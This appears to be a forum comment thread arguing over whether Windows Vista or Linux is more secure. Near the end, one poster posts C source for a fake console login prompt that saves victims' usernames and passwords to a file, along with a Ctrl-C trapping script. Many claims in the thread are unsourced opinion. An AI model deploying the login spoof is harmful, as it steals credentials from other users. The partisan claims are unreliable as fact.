Microsoft is banking on enhancements to what it has dubbed the fundamentals to entice enterprises to upgrade to the next version of Windows, known as Vista. The company will use upcoming industry shows to sing the praises of improvements to the Windows networking stack and secure networking techniques such as server and domain isolation to sell both Vista and Longhorn, the planned update to Windows Server.
considering microsoft’s track record and history of the Windows product line since its beginning i would NOT bank on Vista AKA Longhorn being secure in any sense of the word…
“considering microsoft’s track record and history of the Windows product line since its beginning i would NOT bank on Vista AKA Longhorn being secure in any sense of the word…”
And given that statistically, Linux is the most cracked into operating system in the world, I would NOT bank on Linux being secure in any sense of the word…
Please don’t throw stones at Windows for problems that arguably, Linux suffers from even worse.
Except that your statements are false.
Statistically Linux is not the most cracked into OS. It’s still Windows
“Statistically Linux is not the most cracked into OS. It’s still Windows
”
Not at all. Windows is certainly subject to more annoying worms and such that launch DOS attacks and that kind of thing. But when it comes to downright hacking: ie: gaining root / administrator privileges on a box, Linux is cracked more often than Windows.
Sorry to burst your bubble, but this is simply not true.
I know there was some report some time back by some shady selfapointed securtiy specialist that made this claim without even disclosing what data their findings were based on.
But this certainly wasn’t a report one could take seriously unless one is only interested in trolling…
Oh, wait…
I would like to see those statistics. Any links?
Could be interesting to see how they have defined the different categories.
Have they taken into consideration that worms have unrestricted access on most Windows boxes because most people are running with admin-privileges?
Cracking a Windows box to get administrator privileges is so easy people don’t want to believe it.
Cracking a Linux box is a lot more difficult. But perhaps the statistics were created on basis of Linspire?
“Cracking a Windows box to get administrator privileges is so easy people don’t want to believe it.”
I bet you can’t do it.
And let’s not forget that a lot of this is based on historical problems with Windows. And if you want to compare history, well, Linux has a rather embarassing history itself. It wasn’t that long ago that most Linux distros had tons of services enabled by default with no firewalls, and the average Linux out of the box install could be rooted in about 5 to 10 minutes by someone who knew what they were doing.
The first one: Depends on how well the system is protected. A standard XP is easy to get control over. But you really should update such a system
The second one: I’ve never tried a Linux distro without firewall enabled. The only embarassing linux distros are the Linspire like systems.
Again: Come forth with links to information about these embarrasing situations, and the names of all the many (non-existent) linux distributions shipped with all kind of services turned on and no firewall.
Come on. 6 years ago firewall was standard in all major linux distributions and many smaller ones as well.
I’ve never hard of a linux system without a firewall. It would be insane (besides that a firewall isn’t really needed on linux in the same way as on Windows – unless you are running web services of course).
“I’ve never hard of a linux system without a firewall. It would be insane (besides that a firewall isn’t really needed on linux in the same way as on Windows – unless you are running web services of course).”
They had firewall capability, sure. But out of the box, they were not turned on.
And 6 years ago, firewalls were *MUCH MORE* necessary on Linux than on Windows. Because out of the box, the typical Linux system 6 years ago had telnetd, sshd, sendmail, ftpd, rpc services, and any number of other exploitable services enabled by default.
Hmm… what distros were these?
Links please… evidence… where is it? Aaahh.. no where.
You’re so spreading lies. Oh I see
I used linux 6 years ago, and firewall was on as default (2 years before this became standard on Windows) – Windows back then didn’t even ship with a firewall – yet had all kinds of services running.
Linux in 1999 could have all these services running without being specially exploitable. Simply because the structure of linux is superior to Windows. But still, I’d like to know which distro’s shipped with all kind of services turned on and no firewall turned on.
Windows is seriously hampered by it’s own construction and will never be even remotely safe until all legacy constructions have been removed. It’ll take another decade (at least).
I’m not lying at all.
You want an example? Take Red Hat 7. It had virtually everything enabled out of the box. And no firewall running by default. There was a fair amount of truth to the rumors that the average Red Hat 7 install would be rooted within 30 minutes of being connected to the net.
And NT4 would be down within 2 minutes. Windows 2000 and XP within 2 minutes as well.
Windows98 within 30 seconds.
Besides that: Firewall in Redhat 7 could be turned on during installation. Just like in Fedora Core.
So if it wasn’t turned on, this would be due to stupid configuration of the system. And it was really easy to enable it, so no excuse for not having it running.
> And NT4 would be down within 2 minutes. Windows
> 2000 and XP within 2 minutes as
> well. Windows98 within 30 seconds.
Nice to see that you can pull numbers out of your ass. Now can you get them from somewhere else?
>> And NT4 would be down within 2 minutes. Windows
>> 2000 and XP within 2 minutes as
>> well. Windows98 within 30 seconds.
>Nice to see that you can pull numbers out of your ass.
Exactly. I mean, it took a whole five minutes for my brothers Windows 98 pc to be completely zombified when he first got his cable modem connection.
And all those articles about how XP is compromised before you can download and install service pack 2. I mean really, even with a high speed internet connection, the patch will take more than 2 mintes to come down. I would say at least 15 minutes before your pc is zombified.
BTW, it took a couple of weeks for my mother’s 2k pc to become a spambot behind a physical firewall. The firewall did not have stateful packet inspection and was eventually defeated. The lesson here is that you need to have a software firewall in place even if you have a physical firewall.
You could start by going here:
http://grc.com/dos/
http://www.futurepower.net/microsoft.htm
http://geodsoft.com/opinion/server_comp/security/openbsd.htm
http://www.computing.co.uk/vnunet/news/2126530/linux-fights-hackers
And read this one too,
http://grc.com/dos/xplaughter.htm
just for the sake of it…
And just follow the links around.
Nice… Now please give me a *REAL* source. Gibson and his antics don’t count.
I’d like to see your sources.
Considering you haven’t checked the sources, and dismiss them, despite the fact they are correct for XP, Win2K and NT4 says a lot about you not wanting to accept the truth.
A default NT4 box can be brought down in 2 minutes. This is true even today. Windows 2003 Server takes a bit longer, due to the security measures taken by Microsoft. It leaves IE pretty useless, but then: Nobody with a sane mind would use IE as standard browser.
> Considering you haven’t checked the sources,
> and dismiss them.
Let’s not forget that Gibson was the same Chicken Little that was ranting before Windows XP was released that Microsoft was going to bring the Internet to a stand still because of the fact that Windows XP supported more of the TCP/IP standard than previous versions did, including the ability to spoof IP addresses. But guess what? Here we are several years after XP was released, and like a true false prophet, Gibson’s prediction never materialized.
Jesper, why are you posting anonymously?
Let’s not forget that Bill Gates was the moron who said: “640 KB is enough for everybody”.
Guess what. It wasn’t.
Everybody can go wrong of the future, since none of us are seers (though some claim to be).
However, most attacks on servers come from Windows based servers, since they are easier to bring down.
And Bill Gates actually missed the whole internet explosion, until they found out how big it was. Then they illegally killed almost all competition. And from that technique used to kill competition stems a lot of the security woes we have on the Windows platforms (we don’t suffer with security woes in general on GNU/Linux).
Let’s not forget that Bill Gates was the moron who said: “640 KB is enough for everybody”.
Guess what. It wasn’t.
Stop bringing up that stupid statement. It was made eons ago (1981), in a completely different era of computing. At that time, there was no way of knowing what was to come in the world of computing. Personal computing didn’t even really exist.
The mere fact that you bring up that statement means you are running out of arguments.
Hey I mere responded to a statement as stupid as that, just to prove how stupid it was.
The whole point is – as I wrote – that nobody can say anything for sure about the future.
At that time, there was no way of knowing what was to come in the world of computing.
Fcuking exactly. That’s the entire point of my post, if you had bothered about reading all of it.
The fact you’re attacking me seems to indicate you misunderstood my post. Or have something against me on a personal level. I don’t think the latter is the case, in which case we can conclude you misunderstood my post.
Please reread it, and you can see that I’m bringing forth the statement from Bill Gates just to prove you cannot beat people for not knowing what the future brings.
Personal computing didn’t even really exist.
Well, that one is factually wrong. Personal computing began in mid-70’es. When the IBM PC came forth PC’s was rather old actually, though the name was new.
The 640 KB barrier became a major problem less than 2 years after the first release of MS-DOS. And Microsoft knew it was a poor solution from the very beginning. But it has nothing to do with my reply to the poster.
i agree with you that one in 1981 didn’t have much knowledge of what was to come. The same was true in 1999. And it will also be true in 3682 (unless something major happens, which I cannot see).
In my reply to him, I write “we are not seers”. How come you missed that. Thom?
> The whole point is – as I wrote – that nobody can
> say anything for sure about the future.
Except that Gibson made the statement a couple months before WinXP was released. And there was no change in technology between his statement and the time WinXP was released. Bill Gates made the statement in 1981, and no one could have ever predicted how much technology would change.
And besides, if you don’t know that Gibson is well known for making abnoxious off the wall statements, and spreading paranoia, you aren’t really paying attention. He is very well known for that.
Bill Gates knew when he came with that statement that it would be a problem in the future.
And in less than two years it became a major problem. Sooner than expected true, but not unexpected.
Technology did not change much in those less than years, but it became a problem none the less.
The same goes for Gibson. And making a statement 2 hours before something happens or 2 decades doesn’t matter. Both statements have an equal chance of being wrong, no matter how good analytical gifts you have.
We cannot see the future. Not two minutes from not, not 2 decades from now.
Not to mention that no one in 20+ years has been able to credibly source that statement to Bill.
Actually he never said that. You’ve fallen victim to a bad rumor.
Where’s your dogma now?
Oh, but he did.
You are practising history revision.
Anyway, I quoted him just to show how stupid the post from anonymous was.
It’s obvious for everyone that you cannot see into the future for sure.
You can make more or less qualified guesses, but even the best guess can be wrong.
That’s the point of my post. Nothing more, nothing less.
Thom’s misinterpretion of my post does not change that, nor does your history revisionism.
No he did not. I would ask you to post any actual source, but you can not and you probably would not anyway. I simply pointed it out so hopefully people reading will see it and maybe actually try to find out for themselves whether or not he said it, rather than take your word for it, or even mine.
No “history revisionism” going on here. Stop trying to argue semantics with me.
I know about his one denial. But that interview is not the least bit credible considering his behaviour in several court meetings, playing the überfool.
He has come with so many nonvisionary comments that being in denial does not seem credible in my eyes.
And the fact that a devoted windows fan boy protects him does not add any credibility either
You haven’t come up with one link to posts where you critisize the ethic behaviour of Microsoft, despite the fact you’ve claimed that you’ve been critisizing the MS behaviour in the past.
And Bill Gates secured the release of Windows95 despite the fact it was designed to crash. That doesn’t add to his credibility either.
Stop trying to change the subject from the quote to me, please. It’s disgusting.
You say Bill Gates denied saying it but he’s not credible. Uh, well ok, that’s fine. But either provide a source to where/when he said it (i.e. what conference, what magazine interview, etc), or shut up.
http://en.wikiquote.org/wiki/Bill_Gates#Wrongly_Attributed
If you can’t provide a source for a SIMPLE QUOTE, then just stop talking about it like it’s true.
I know of that link. And that particular page contains some factual errors in regard to hardware/software limitations. A wikipage with errors does not add any credibility.
You changed the subject to me. I changed it to you. If that’s disgusting, then you’re low-level personal attack on me was disgusting, too. It works both ways, you know.
And I did mention where I saw it the first time.
I do not see where you mentioned where you first saw it. I still don’t see it after looking.
Either provide a direct source or stop making the claim. That is all there is to it.
You’re blind then.
I looked at all your posts in this thread. Please provide a direct link.
Aarrgghh… okay.
The “hahaha hehe” thread is pretty longwinded. I’ll search for it immediately. Please give me 20 minutes.. no 30 minutes. And then write again to my email if I haven’t posted anything.
> And Bill Gates secured the release of Windows95
> despite the fact it was designed to crash.
I see have bought into the FOSS conspiracy boys hook line and sinker.
Do you honestly believe Windows 95 was intentionally designed to crash? You are seriously deluded if you do.
The 2 MB limit on System Resources meant that it would crash no matter what.
The fact it was designed that way allowing crashes sooner or later, means that it was designed to crash.
I don’t doubt Microsoft did what they could to minimize the problem, but the design of Win9X means it’s going to crash sooner or later.
For a very short while I ran Win98 on this machine, and I had to reboot every 25 minutes due to lack of System resources. 2 MB are not enough for system resources.
> Anyway, I quoted him just to show how stupid the
> post from anonymous was.
Again, it was not stupid. The statement attributed to Bill Gates was made in 1981. It would be at least 7 years before the average PC had more than that.
This is way different then Gibson shooting off his mouth with his Chicken Little propeganda a couple of months before WinXP came out and 0 technolgy change between then and when it did come out.
And like I said, Gibson is well known for his Chicken Little antics of crying wolf when there is no wolf around. If you don’t know that, you really haven’t been paying attention.
Actually it became a problem already in 1983.
That’s why Bill Gates was so interested in the 80386 processor.
Your comment was stupid, just like my post. I posted it to prove the stupidity of your post, but of course it doesn’t work with all the zealots around here.
> Your comment was stupid, just like my post.
It’s not stupid. And you are just digging yourself a deeper hole by continuing to try to defend Gibson when he is well known for making these kind of far reaching, baseless cry wolf claims.
And no, it was not a problem in 1983 considering that 640 K was a massive amount of memory in 1983. The typical personal computer at the time from other companies had less than 64 k of RAM and was quite fine for most users.
And as has been pointed out, most likely Gates did not even say that. It’s an Internet legend and there is absolutely no source for it. No one heard him say it, no one knows where he said it, etc.
Gibson’s wolf crying however, can be traced back his own articles on how Windows XP was going to grind the Internet to a halt with DDOS attacks.
It was a problem in 1983. It was a major issue in regard to the development of Windows.
BTW, it is probably true that Bill Gates never actually said this.
First of all, there are actually two versions of the same quote floating around “640 K ought to be enough for anyone” and “No one will need more than 637 kb of memory for a personal computer.”
Bill Gates denies having ever said either one, and rightfully points out that not one single place that attributes this quote to him actually can cite where it was that he said it.
This is most likely an Internet legend. As I said, no one knows where it came from, and no one can seem to even know what event, speach, etc. he apparently said this at.
Well, the latter one did not come to me until 2004. And is probably a corruption of the original. There is no trace of the latter one until mid-90’es while the first sentence is mentioned in a danish computer magazine from 1989.
That pretty much shows that the “Internet Legend” theory does not seem reasonable.
He also said:-
“I believe OS/2 will be the operating system of the 90’s”
oh well – no harm in being wrong once in a while…..
“I believe OS/2 will be the operating system of the 90’s”
Given that OS/2 was technically superior to Windows, and in some areas, to this day is still technically superior despite the fact that there hasn’t been a new release in years, that statement makes sense.
The only reason OS/2 did not become the operating system of the 90’s is because IBM and Microsoft couldn’t work out their differences, so they each took their ball and went home.
That’s a pretty correct description of what happened.
One might add that IBM did seriously bad marketing on behalf of OS/2, but the beginning of the 90’es wasn’t a good period for IBM.
Well, IBM’s on again / off again support for OS/2 is basically what did it in.
First they targetted home users with OS/2 Warp, touting it as a serious gaming platform and such and doing mall demos. Then they did a 180 and said “We are not interested in home users and only want to target business users.”
And then there is the fact that IBM’s own hardware division was basically working against OS/2. OS/2 preloads were not even an option on most IBM machines. They did Windows preloads on virtually everything. One of my friends did request an OS/2 preload on an IBM machine one time, and the sales representitive actually said to him “We can probably do that. But why would you want to?”
Basically, it was a mess. And yes, IBM has to take a lot of the blame for the fact that OS/2 didn’t succeed.
Yup. Too bad though, because OS/2 was really great. There’s a lot of functionality in the WPS which you cannot find anywhere else on the x86 platform.
The numbers are not quite as far off as you may think. Here is a little light reading for you:
http://www.honeynet.org/papers/stats/
http://project.honeynet.org/papers/trends/life-linux.pdf
http://www.honeynet.org/papers/bots/
Classify it as FUD if you like, but I think that is tantamount to just burying your head in the sand. The Honeynet project has been around long time and their methodology is well documented and pragmatic. They have even published some facinating books about it.
> Linux in 1999 could have all these services
> running without being specially exploitable.
> Simply because the structure of linux is superior
> to Windows.
And by the way, can you back up that statement? That is is superior to Windows? I bet you can’t. But I can provide specific areas where it is inferior. Example: The Unix authentication model is seriously flawed. It is insanely easy to replace the Unix login prompt with a trojan that will intercept passwords and do something malicious with them. That is a lot harder to do in Windows because of how it specifically kills any other attempts at spoofing a login screen when you issue the Ctrl-Alt-Delete combo to bring up the login prompt.
> Linux in 1999 could have all these services
> running without being specially exploitable.
In 1999, there were still serious security vulnerabilities in sendmail and ftpd. And rpc in Linux is dangerously insecure to this day.
it seems very odd that microsoft ordered a complete rewrite of the code for vista. if there wasn’t anything wrong with the infamously horribly broken design of microsofts code, why was there a need for a complete rewrite? if its not broken, then it doesn’t need fixing.
vista: same shit, different OS.
We always hear that each version of Windows is a complete rewrite. Is VISTA not really windows 2003 server???
RPC is dangerously insecure in Windows to this day. Despite that Windows uses RPC at an extremely high degree.
Safe RPC does not exist. That’s one of the major reasons why Windows are insecure.
The login-box in Windows is one of the weakest spots in Windows (in part due to the Ctrl+Alt+Del combination), while replacing the Linux login is really difficult. On my system virtually impossible, since I’m not running any services which could be accessed from outside. It would require somebody to run a script with root rights on my system. And that’s not going to happen. It would require a lot of work to do that.
How do you propose to replace the login?
> while replacing the Linux login is really difficult.
It’s not difficult at all. Without even looking up info on it, I can think of three ways off the top of my head to spoof a Linux login prompt and you would never have any indication it was a fake.
Now please tell me why Ctrl-Alt-Delete makes the Windows login insecure? It actually kills any programs attempting to present themselves as a login manager. Linux does nothing of the sort. It will present whatever I tell it to present as the login manager. That means X login managers like xdm, gdm, and kdm can be easily spoofed as well.
Then mention them or come with links to sites proving this.
How would you sneak in the trojan?
You cannot spoof the X login managers without having root access. Now, how will you get that? It’s virtually impossible to get a process running as root, unless you start it manually. So how would you make the user do that?
The Windows logon is extremely insecure. Ctrl+Alt+Del actually making it worse. Linux does not have such a thing, because it’s not needed. Linux login does not suffer from the weaknesses in Windows.
You are claiming a lot, but not proving anything.
> How would you sneak in the trojan?
By rooting the system, taking advantage of an incorrectly configured service, or an exploitable service, etc. Sure, I would need to obtain the ability to replace getty or something. if I can gain write access to that directory, that’s easy to do.
Now please tell me how the Ctrl+Alt+Del is insecure. I asked you how, and all you did was repeat yourself by saying “it makes it worse”. You didn’t say how. So I will ask you a second time. How does Ctrl+Alt+Del make it worse?
> You are claiming a lot, but not proving anything.
Hello pot, my name is kettle. Nice to meet you. You haven’t backed up your assertion that Windows login is insecure either, or that Ctrl+Alt+Del makes it worse.
How would you root the system?
Come with examples of an exploitable service, when no accessible services are running.
We’re talking about standard systems, and not a system configured to let you in. But a standard system.
No standard linux system would ever let you in. But a standard windows system pre-win2k3 will.
In regard to Ctrl+Alt+Del I’ve already replied earlier in other posts. I don’t want to repeat myself because of a troll.
Read the posts before replying. That tends to make it easier to see what you’re replying to.
Please see my other reply [13]. I don’t even have to root the system to exploit Linux / Unix’s flawed login system locally. All I have to do is have a local account as a normal user and I can easily trick someone into entering a username and password into my trojan and steal their credentials. Yes, that requires a shared terminal. But as I said, that kind of shenanigan is not possible to do on Windows. It is easily done on Linux or other forms of Unix though.
You don’t use shared terminals. Ever. On any system.
But it’s a nonissue cracking a Windows 2003 Server if I’m allowed to sit in front of the system.
With that kind of access I can do magic in a few minutes.
Remote access is a different issue though.
> But it’s a nonissue cracking a Windows 2003 Server
> if I’m allowed to sit in front of the system.
> With that kind of access I can do magic in a
> few minutes.
No you can’t. If you are normal user, and the server is configured correctly, you would not be able to crack it in just a few minutes. And you wouldn’t be able to spoof a login screen to steal someone’s password like you can in Linux / Unix.
Well, I don’t know what you mean with a correctly configured server, so I can’t say for sure if I could crack a server configured by you. If you mean encrypted filesystems that of course makes it a lot tougher, but usually people don’t do that. Not even in companies. And that’s a major mistake if you ask me.
Stealing passwords are easy if you can sit in front of said machine. Linux aren’t too good here either.
> Stealing passwords are easy if you can sit in front
> of said machine. Linux aren’t too good here either.
It’s concievable you could swipe a password on Windows with only normal user access. But it’s not nearly as easy as on Linux. As I said, on Linux, it requires nothing more than starting a program that spoofs the look of the login manager instead of actually logging out. The next guy who comes along will have no visual indication that the login manager he is seeing is not the real one. In Windows, pressing Ctrl+Alt-Del before logging in would kill the fake login manager.
This is a serious flaw in Linux / Unix that needs to be fixed. There is absolutely 0 protection against spoofing a login manager locally.
Well, it depends on the configuration. You couldn’t do it on my former LFS system, nor on my gentoo system running now. But none of these were/are configured as standard systems.
I’ve never used a 100% standard configured linux system (nor windows system), so I’ll have to take your word for it.
But configured with SSH (and more), you cannot pull off that trick, according to what I know. But you might know more ways do it than I would ever care about
> But configured with SSH (and more), you cannot pull
> off that trick, according to what I know.
Well, it wouldn’t even work over telnet. What I have given you is strictly a local exploit… Well, it is local until someone su’s to root on the local console, does a sudo to run a command as root on the local console. My program could, of course, watch for that, and once it had the root password, do anything it wanted to, remotely or otherwise. But the initial stealing of the root password would require two things:
1. I have a local user account on the system, and can log in from the local console.
2. The su or sudo to root is done from that same local console.
This is where the lack of a Ctrl-Alt-Del sequence that starts a new login manager and kills any existing one that is already running is a serious problem for local security.
I guess you’ve never heard of Invisible Keylogger Stealth… google it and get a copy. It will steal your password EVEN on the CTRL ALT DEL Login box.
> I guess you’ve never heard of Invisible Keylogger
> Stealth… google it and get a copy. It will steal
> your password EVEN on the CTRL ALT DEL Login box.
But it requires someone with admin privleges to run it in order for it to work. The code I present in my previous post does not. Any malicious Linux user who has an account (root or not) can run this code and set up a believable login prompt that steals passwords.
“But it requires someone with admin privleges to run it in order for it to work.”
everyone has admin rights on windows. thats one of the infinite reasons why windows is so insecure and untrusted.
i really don’t know where you get your primitive ideas about hacking into a linux system merely by recreating the login. it seems like you haven’t used linux in the last 10 years. you cannot do what you are claiming can be done on gdm or kdm.
even if someone spent all their time as root on a linux system, it is still considerably more secure than any windows system due to its design superiority, many of which features have been taken from *nix systems to be incorperated into vista. please stop your FUD about linux and windows.
> everyone has admin rights on windows. thats one of
> the infinite reasons why windows is so insecure
> and untrusted.
That’s not true. Only the first user created has admin rights by default. The problem is that most Windows users don’t create another account for themselves that does not have have admin rights. They just always use the account they create during setup which does have admin rights.
This isn’t much different than most Linux distributions really, except that Windows doesn’t warn users about the dangerous of running with administrative privileges and ask them to create an account for themselves that does not have admin privileges.
> you cannot do what you are claiming can be done on
> gdm or kdm.
Yes it can. It just requires a more advanced program that presents a full screen login display using gdm or kdm.
> even if someone spent all their time as root on a
> linux system, it is still considerably more secure
> than any windows system due to its design superiority.
Not at all true. Linux is just as insecure as Windows when running as root. Especially if you give the user the same typical level of knowledge as the typical Windows user. The typical Windows user runs email attachments. If you are running as root on Linux, and I send you an email attachment, and you run it, I can do whatever I want on your system. The email attachment might be nothing more than a simple bourne shell script. If you run it as root, I have full access to your system to do whatever I want.
ever tried pressing ctrl+c? you’d probably have a hard time writing a fake console login manager that that wouldn’t kill… and ctrl+alt+backspace would take care of any x-based ones…
> ever tried pressing ctrl+c? you’d probably have a
> hard time writing a fake console login manager
> that that wouldn’t kill…
Not at all. Ctrl-C is easily trapped. I can even trap Ctrl-C from a shell script. Don’t even even need C to do that. And no, I don’t need to be root to trap Ctrl-C.
The only signal I can’t trap is SIGKILL. All other signals can be trapped. And you don’t need to be root to do so.
@24.118.179.—
So you say Ctrl+C is trappable, what about Ctrl+Alt+Backspace, which logs the user out of their current session? If one were really paranoid they could do that before every Linux login.
I don’t see how touting Ctrl+Alt+Del from Windows is all that great, it’s just pressing extra keystrokes, which I believe Ctrl+Alt+Backspace will replicate fine on Linux. Let me know if it is trappable though.
> So you say Ctrl+C is trappable, what about
> Ctrl+Alt+Backspace, which logs the user out of
> their current session? If one were really paranoid
> they could do that before every Linux login.
It can’t be trapped because it is not an OS signal like SIGINT (Ctrl-C) is. It can be disabled in the X config file with the “DontZap” option. That does require root access of course, but many public terminals (such as those in University computer labs) do have the DontZap option in the X config file because they don’t want normal users to be able to kill the X server (which would be rather nasty if remote users were using X applications on that system.)
Still worth considering. Interesting discussion either way.
> Still worth considering. Interesting discussion
> either way.
What it really needs is a way to restart the X login manager that does not involve zapping the entire X server. That would allow the kind of security you want (you can ensure you really are logging into kdm or gdm and not someone else’s trojan they left running), while at the same time protecting remote X application users from having someone pull the X server out from under them like Ctrl-Alt-Backspace would do.
> ever tried pressing ctrl+c? you’d probably have a
> hard time writing a fake console login manager
> that that wouldn’t kill…
And just to prove it to you,
Try running this shell script:
#!/bin/sh
trap noctrlc 2
noctrlc()
{
echo “You can’t get out of here with Ctrl-C”
}
read foo
http://home.eunet.no/~pnordahl/ntpasswd/
> You don’t use shared terminals. Ever. On any system.
…You don’t? So much for university computer labs, or library computers I guess.
If such a system was running Windows it would usually be a no-brainer to get the password.
I know I could easily break into another user’s systems at my college. At least at the end computer, if not the central server. But then, the systems are configured with less-than-optimal security (which is actually a standing joke in my class). I have a much higher security level at home.
> If such a system was running Windows it would
> usually be a no-brainer to get the password.
Please tell me how you would do it. I told you how to do it in Linux. Now tell me how to do it in Windows.
What I suggested in Linux could concievably go for a long time without being detected. Since once I have swiped the user’s password, my program can intercept everything that the user types, and sudo it to the user who’s password I have stolen. Potentially my program could even su to that user (redirecting stdout and stderr to /dev/null or something along those lines so the user doesn’t actually see it happen of course). In other words, even after the user is logged in, everything will work the way they expect it to, and they will still have no indication something is wrong. WHen they log back out, my program intercepts that as well, and returns to the normal login prompt, leaving my trojan running for the next guy.
This is painfully easy to do on Linux using only a normal user account.
Now again, please tell me how you would do it on Windows. you claim you can do it. But you won’t tell me how. I’ve given you detailed instructions on how to do it on Linux.
Your instructions wasn’t exactly detailed. And I don’t know if your configured system is using encrypted filesystem. If the latter one is the case, I wouldn’t try it.
But on a normal configured XP system all I need is a XP boot disk (cd, usb, whatever) with a dedicated application.
After booting, I can access all accounts at that PC without any glitches, having full administrator rights. Deleting accounts, changing passwords etc. Without anyone seeing it afterwards. And leaving a replaced login application would then be a no-brainer. It could be done even easiler if one can somehow trick the user with admin rights to install it himself, by packaging it as a logon box with NextStep look or something like that.
Then Ctrl+Alt+Del won’t kill it.
> Your instructions wasn’t exactly detailed.
Sure it was. The only detail I didn’t give you is the actual source code to write the login spoof. But that is extremely trivial to write.
> But on a normal configured XP system all I need is a
> XP boot disk (cd, usb, whatever) with a
> dedicated application.
That’s no different than Linux though. On Linux, I can boot from floppy or CD or USB as well from a Linux boot disk, and then mount the root partition on the hard disk under a mount point on my bootable floppy / CD / USB device. Once I’ve done that, I have root access to the file system.
The defense against that, is, of course, to make sure the BIOS is configured to not allow booting from any of those devices. But if that is done, it foils such attempts on both Linux and Windows.
Well, depends if there is a password on the BIOS setup tool.
This is usually not the case.
> Well, depends if there is a password on the BIOS setup > tool.
>
> This is usually not the case.
True. But in that case, virtually any OS is vulnerable. Because on Windows, Linux, FreeBSD, NetBSD, and many others, I could boot from an external device, mount the root partition on a mount point on my bootable device, and then have full access to the system. So what you suggested is not a flaw in Windows. It exists in a lot of operating systems, including Linux.
Well, true if talking about getting access to files. But it’s harder to get access to user passwords on a linux system in this case than on windows. If configured as standard (this is an important part – a few tricks on system side is enough to change it. Encrypted filesystems are a good thing here).
Another issue would be the security at BIOS level. Even now many mobos comes with a master password overriding whatever password one has chosen. Perhaps it’s about time looking into that as well.
Seems to be a forgotten issue in general.
> Well, true if talking about getting access to files.
> But it’s harder to get access to user passwords on
> a linux system in this case than on windows.
But I don’t need access to the user passwords. Once I have root access (which I would have if I booted from an external device and mounted the hard disk on a mount point) and I can do anything I want. I could even edit /etc/shadow and reset root’s password.
And since you wanted more details on my local login prompt exploit. I will give you the source code for a bare example. I don’t feel like I am showing anyone how to crack here because this is blatently simple, and only shows the basic beginnings to show that it is really easy to spoof a believable login prompt. Fleshing the program out would involve things like adding sudo / su commands so the user could operate normally as themselves. And having the program intercept logout commands so it could reset itself and run again (as is, it is a one shot deal and only works once for the next person who logs in).
#include <stdio.h>
#include <stdlib.h>
int main()
{
FILE *f;
char login[25];
char pass[25];
system(“clear”);
printf(“Monkey Linux 5.7
“);
printf(“login: “);
scanf(“%s”, login);
printf(“password: “);
system(“stty -echo”);
scanf(“%s”, pass);
system(“stty echo”);
printf(”
“);
f = fopen(“/home/eviluser/stolen.txt”, “w”);
fprintf(f, “%s
%s”, login, pass);
fclose(f);
}
If you change Monkey Linux to the header that your own Linux distro displays and compile and run this program, you can see how it would easily fool any user into thinking they were at a real login prompt.
Those “n” are supposed to be newline characters. The forum software apparently stripped the backslash escape codes. So replace n with backslash n.
Yeah I see… And I’ve noticed the forum backend stealing characters as well. Quite annoying when ones indentation gets screwed up
It would look better if you added some code to check the configuration files for extra strings, so it looked entirely like the login at that system.
DISCLAIMER: I’m not condoning breaking into anybodys system.
And replacing the login-box in Windows does not require more than a script and a user with poweruser rights and a tendency to click on links for nude pics of Britney Spears.
But that isn’t an issue if it’s a company server (or it shouldn’t be). However for home users, it seems to be a major reason for woes.
“In regard to Ctrl+Alt+Del I’ve already replied earlier in other posts”
No, you didn’t. You did not state in any other posts how Ctrl+Alt+Del makes it anymore secure.
> I don’t want to repeat myself because of a troll.
Yeah. Typical childish zealot defense. “That person doesn’t agree with me that Windows sucks and Linux rules. So they are a troll.”
Glad to see that calling me is a troll is the extent of your argument.
Well, at least I’m not hiding myself behind “anonymous”
And I did state it in one of my earlier posts. But I’m losing track of them right now.
if I didn’t state it in any of those terribly many posts, then I owe you an apology.
And btw: I’m not a zealot by the definition of zealot.
A zealot is a person who is obsessed with something, and I’m not obsessed with anything. Perhaps apart from Monty Python and the Quest of the Holy Grail. And other movies in that genre.
Yes, I guess you’re right about the *dm being ‘easily spoofed’ in that I could configure a box to run whatever I want. However, that would assume full access to the box to be able to do that.
In the same way, with full access to a Windows box, one could replace the gina – or even chain it, just like Novell did with the Netware Client for Windows, and also ‘do whatever I like with the passwords’ etc.
The fact remains that, generally speaking, remote priviledge escalation us a more common feature of Windows exploits/vulnerabilities than linux ones.
Neither OS is perfectly ‘secure’ and, while being more secure was part of the reason I chose to use linux, it’s certainly not the biggest reason.
The biggest reason for me was simple – choice. Because I can.
(apologies for the off-topic ending).
> In the same way, with full access to a Windows box,
> one could replace the gina – or even chain it,
> just like Novell did with the Netware Client
> for Windows, and also ‘do whatever I like with
> the passwords’ etc
It’s more difficult in Windows though because of the fact that the Ctrl-Alt-Del key combination kills any login manager that is currently running and starts a new one. So it’s harder to exploit in Windows.
That’s the main flaw with the Linux / Unix authentication model. It doesn’t start a new login manager right before you log in. That opens the possibility that even a malicious local user can spoof the login and steal a password. Consider the following scenario: I log in to my account on a public terminal, but instead of logging out, I start a program I have written that mimics the Linux login prompt. The next guy that comes along and wants to login has absolutely no indication that what he is looking at it is a spoofed login manager, and he logs into my program, and I steal his password.
It’s not possible to do a shenanigan like that on Windows because of the fact that the login manager will be restarted right before you login.
While I can see the advantage in starting a new login manager right before login (as Windows does and linux doesn’t), that still doesn’t change the fact that if I’ve compromised the box and replaced/chained the gina, a new login manager is still going to run the same code – my code.
In your public terminal example, having linux start a new login manager rather than your mimicing program would be a great thing agreed.
I’d tend not to trust public access terminals anyway – regardless of the OS – and recommend people to excercise caution (like not accessing banking systems etc), and then changing the password from a trusted terminal ASAP after using the public one.
I must say, it’s awesome to actually have some intelligent discussion like this for a change. These sorts of forums and such (not limited to OSnews) mostly seem to attract the nastier of either side of the fence! It is you Jesper isn’t it?
> Safe RPC does not exist.
Sure it does. Safe RPC has existed in Java for years. And with the introduction of the WinFX API in Vista, it will exist in Windows as well.
Now tell me how to do safe RPC in Linux again?
RPC exists already in Windows and is a major cause of security woes.
Safe RPC does not exist. Java RPC isn’t secure. It might be safer than in Windows but it isn’t secure.
RPC is avoided in Linux because it is an insecure model. It is heavily used in Windows, which is one of the major reasons why Windows is so insecure.
> Safe RPC does not exist. Java RPC isn’t secure.
> It might be safer than in Windows but it isn’t secure.
…You don’t know anything about Java do you?
Yes, it is safe in Java. And it is a VERY common practice to do RPC in Java. Web services are only possible because of things like XML-RPC, and hessian, and other such RPC technologies.
Thanks to the byte code verifier, and the class loader, and the security manager, yes RPC is safe in Java. And it will be safe in WinFX because it clones a great deal of the Java security model.
I do know Java. I’m using it on daily basis and have done so for years.
